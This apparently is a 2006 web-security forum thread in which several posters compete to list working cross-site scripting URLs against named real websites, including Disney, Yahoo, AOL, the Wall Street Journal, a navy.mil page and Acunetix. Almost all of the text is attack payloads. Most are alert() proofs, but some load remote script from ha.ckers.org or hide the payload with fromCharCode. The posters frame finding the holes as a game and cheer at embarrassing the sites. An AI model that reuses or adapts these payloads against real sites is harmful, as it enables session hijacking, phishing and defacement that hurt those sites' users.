http://search.disney.go.com/exec/?dym=1;i=1;land=1;m=1;oq=%3Cscript%3Ealert(%27xss%27)%3C%2Fscript%3E;x=19;y=8;r=1

----------
'Just because you got the bacon, lettuce, and tomato don't mean I'm gonna give you my toast.'

http://playboy.rgc2.com/servlet/campaignrespondent?email=%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E&emailButton=Yes%21&_ID_=pla.2264&Campaign_=NewProfileEntryPointCmpgn_SiteWideCollection&SIGNUP_ORIGIN=Passive_header_sitenav&SIGNUP_URL=

- RSnake
Gotta love it. http://ha.ckers.org

http://www.portblogs.com/blogpublisher/app/ext/sendthis.aspx?p={FBC2E0F6-C969-498C-BC24-B1AE8C9E63A3}&u=%3Cscript%3Ealert(%22XSS%22)%3C/script%3E

- RSnake
Gotta love it. http://ha.ckers.org

Boldy go where no nerd has gone before: http://www.startrek.com/startrek/view/search/result.html?type=article&search=%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E&category=

- RSnake
Gotta love it. http://ha.ckers.org

http://weather.aol.com/search.adp?search=%22%3E%3Cscript%3Ealert('xss');%3C/script%3E

----------
'Just because you got the bacon, lettuce, and tomato don't mean I'm gonna give you my toast.'

hrm, in the shop subdomain: https://shop.starwars.com/myaccount/forgotten_password.html?retrieve=1&goback=&email=asdf%22%3E%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E&LoginBtn.x=77&LoginBtn.y=11&LoginBtn=Submit

-maluc

http://www.whiteacid.org/misc/xss_post_forwarder.php?xss_target=http://www.gm.com/Scripts/SearchServer.exe&query=%22%3E%3Cscript%3Ealert('!');%3C/script%3E&method=mainQuery&Submit=Submit << gm.com

----------
'Just because you got the bacon, lettuce, and tomato don't mean I'm gonna give you my toast.'

http://validator.opml.org/?url=%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E%3Cx%22

encode those brackets rsnake .-.

-maluc

http://www.w3.org/2001/10/glance/view/?feed=%22%3E%3C/a%3E%3C/h3%3E%3Cscript%20type=%22text/javascript%22%3Ealert(%22Tried%20to%20keep%20it%20W3C%20compliant.%22);%3C/script%3E%3Ch3%3E%3Ca%20href=%22http://www.w3.org
http://www.w3.org/2001/10/glance/view/?since=%22+%2F%3E%3Cscript+type%3D%22text%2Fjavascript%22%3Ealert%28%22XSS%22%29%3B%3C%2Fscript%3E%3Cbr+a%3D%22
http://www.w3.org/Search/Mail/Public/search?keywords=&hdr-1-name=subject&hdr-1-query=&index-grp=Public__FULL&index-type=t&type-index=XSS+Here%22%3E%3Cscript+type%3D%22text%2Fjavascript%22%3Ealert%28%22XSS%22%29%3B%3C%2Fscript%3E%3Cbr+a%3D%22

-maluc



Edited 2 time(s). Last edit at 09/27/2006 01:31AM by maluc.

Ouch.

http://order.sbs.yahoo.com/ds/DomainSearchResults?.p=YD1&m=dom&.src=sbs&.promo=BESTDEAL&d=%22%3E%3C/a%3E%3Cscript%3Ealert('xss')%3C/script%3E

- Kyran

http://viewer.youtubech.com/?q=%22><script>alert(%22XSS%22)</script><b%20=%22 thats youtubech, not youtube
http://rss.scripting.com/?url=http%3A%2F%2Fgoogle.com%2F%22%3E%3Cscript%3Ealert(%22XSS%22);%3C/script%3E%3Cb%20a=%22 needs a valid domain first.. then /<script>blah
http://megalodon.jp/?url=http%3A%2F%2F%3Cscript%3Ealert(%22XSS%22)%3C/script%3E

-maluc



Edited 1 time(s). Last edit at 09/27/2006 02:25AM by maluc.

damn maluc - everytime i try to one up you, you always come back with something bigger...

Also i have noticed we have successfully hit the 4 of the 5 major search engines as well as a relatively large number of the top 100 websites going around (apparently all we needed to do was look).

congratulations to all.

http://www.latimes.com/search/dispatcher.front?target=blendedsearch&Query=%22%3B%3E%3C%2Fscript%3E%3Cscript%3Ealert%28%27xss%27%29%3B%3C%2Fscript%3E

http://online.wsj.com/public/search/page/3_0466.html?KEYWORDS=%22%3E%3C/iframe%3E%3Cscript%3Ealert('BUY%20STOCK%20IN%20digi7al64')%3C/script%3E&x=0&y=0 << Wall Street Journal

----------
'Just because you got the bacon, lettuce, and tomato don't mean I'm gonna give you my toast.'

lol, i try to keep you on your toes ^^.

http://www.navair.navy.mil/pke_popup.cfm?app=%3Cscript%3Ealert(%22XSS%22)%3C/script%3E

news sites don't seem to budget much in the way of web application auditing, which is sad - they have alot to lose from humiliating XSS exploiting.. and good job with yahoo by the way, search engines are often a pain .. google in particular

-maluc

"Congratulations, your domain name is available! quotalert39xss39.com"


SWEET, I always wanted quotalert39xss39.com!

-id

lol, that probably won't run without the semi-colon though :/

http://www.caltex.com/corp/en/Search.asp?qSearchText=Where%20Could%20It%20Be%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E%3Cb%20a=%22 i guess these are the texaco's for non-texans? never seen one

-maluc

id Wrote:
-------------------------------------------------------
> "Congratulations, your domain name is available!
> quotalert39xss39.com"
>
>
> SWEET, I always wanted quotalert39xss39.com!

Too late. :P

- Kyran

http://www.ge.com/jsp/search/newSearch.jsp?spell=true&lemmatize=true&properName=true&offset=0&curGroup=0&filter=&type=any&textToSearch=No+Breakout+Needed%252E+++++%253Cscript%253Ealert%2528%2527XSS%2527%2529%253C%252Fscript%253E&withinQuery=No+Breakout+Needed%252E+++++%253Cscript%253Ealert%2528%2527XSS%2527%2529%253C%252Fscript%253E&keywords=&similarType=&breadcrumb=&withinQuery_2=No+Breakout+Needed.+++++%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E

-maluc

PCI Compliance by 'authorized' security consultants, is just another money milking scam from the merchants =.= .. hopefully these guys don't charge much, as they probably don't do much: https://www.securitymetrics.com/eval_scan.adp?action=next&mc=1&email=they+might+wanna+scan+themself%22+onmouseover%3D%22alert%28%27XSS%27%29%22+style%3D%22-moz-binding%3Aurl%28%27http%3A%2F%2Fha.ckers.org%2Fxssmoz.xml%23xss%27%29%22&webserver=they+might+wanna+scan+themself%22+onmouseover%3D%22alert%28%27XSS%27%29%22+style%3D%22-moz-binding%3Aurl%28%27http%3A%2F%2Fha.ckers.org%2Fxssmoz.xml%23xss%27%29%22

-maluc

even a persistant one: https://www.securitymetrics.com/results_home.adp?email=asdfe%40yahoo%2ecom&hash=4408ccdc7930&login=true&sat=

may not work after a while if the hash is temporary.

-maluc

Sweet. Who is this "Xssman"? Lol

- Kyran

Just you friendly vigilante of stallownage ^^

-maluc

http://weather.aol.com/search.adp?search=XSS%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E%3Cb=%22 a second injection place
http://music.aol.com/search/artistresults.adp?query=asdf%22;alert(%22XSS%22);t=%22 javascript injection, no filters
http://music.aol.com/search/artistresults.adp?query=No%20Breakout%20Needed.<script>alert(%22XSS%22)</script> plaintext injection, no filters
http://movies.aol.com/search/dvdresults.adp?query=asdf%22;alert(%22XSS%22);t=%22 same javascript injection, no filters
http://movies.aol.com/search/movieanddvdresults.adp?query=asdf%22%3E%3Cscript%3Ealert%28%22XSS%22%29%3C/script%3E%3Cb%20x%3D%22 input tags, but also seriously broke the page :/
http://movies.aol.com/search/dvdresults.adp?query=%3Cscript%3Ealert(%22XSS%22)%3C/script%3E same plaintext injection
http://aol.careerbuilder.com/PLI/QuickSrchV2.asp?CatalystID=JS_AOL_MainQSBox&SiteID=cbaol003&lr=cbaol&QSCTY=%3Cscript%3Ealert(%22XSS%22)%3C/script%3E&QSSTS=ALL,US&QSKWD=&QSJBT=All&QSJBT=All&QSJBT=All same plaintext
http://videogames.aol.com/results.adp?title=%3Cscript%3Ealert%28%22XSS%22%29%3C/script%3E same plaintext

I'm tired of copy pasting them, but you get the idea..

-maluc



Edited 1 time(s). Last edit at 09/27/2006 05:25AM by maluc.

Whoah... nice ones guys... I got to bed for a few hours and you guys up your game considerably!

- RSnake
Gotta love it. http://ha.ckers.org

WTF you sleeping for? GBTW!

-id

I want to know how Kelly Higgins (DarkReading) got my e-mail.
Am I on some sort of hacker mailing list now?

Anyways, I replied, elaborating that the F5 vulnerability was just html injection
and that as far as I remember, the Acunetix vulnerability DID work. (They seem to have fixed and denied it).

As well as include a new list of sites that we have added to our big list.

- Kyran

per http://sla.ckers.org/forum/profile.php?3,63 :

User Profile : Kyran
Email: YourEmailHere
Posts: 87
Date Registered: 09/15/2006 12:29PM
Last Activity: 09/26/2006 04:31PM

you can set your email to hidden if you wish.

Edit: oh lol, i suppose you won't be able to hide it either way, if i post it here. censored.

-maluc



Edited 1 time(s). Last edit at 09/27/2006 01:08PM by maluc.

http://www.darkreading.com/document.asp?doc_id=104739&WT.svl=news2_1

And it is my understanding there is another follow-up coming.

- Kyran

I had a reasonably long email conversation with her too. So far she's not really used any of the stats I gave her. Oh well...

Don't forget our IRC: irc://irc.irchighway.net/#slackers
-WhiteAcid - your friendly, very lazy, web developer

well reporters are reporters .. they'll write what makes for an interesting read and keeps their bosses off their back.

http://www.lightreading.com/search.asp?simple_search=yes&search_value=XSS+here%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E&search_timespan=past_year

-maluc



Edited 1 time(s). Last edit at 09/27/2006 03:00PM by maluc.

And for the Acunetix troupe who check their website 'on a daily basis to ensure no such vulnerabilities exist' .. http://support.acunetix.com/index.php?form_submit=forgot_email&mod_id=6&forgot_email=XSS+is+here.%5C%22%3E%3Cscript+src%3Dhttp%3A%2F%2Fha.ckers.org%2Fs.js%3E%3C%2Fscript%3E

stallone haters, use the plain one: http://support.acunetix.com/index.php?form_submit=forgot_code&mod_id=6&forgot_email=XSS+is+here.%22%3E%3Cscript%3Ea%3DString.fromCharCode%2883%29%3Balert%28String.fromCharCode%2888%29%2Ba%2Ba%29%3C%2Fscript%3E%3Cx+x%3D&forgot_code=XSS+here+too.%22%3E%3Cscript%3Ea%3DString.fromCharCode%2883%29%3Balert%28String.fromCharCode%2888%29%2Ba%2Ba%2B2%29%3C%2Fscript%3E%3Cx+x%3D&forgot_password=asdf&verify_password=asdf

-maluc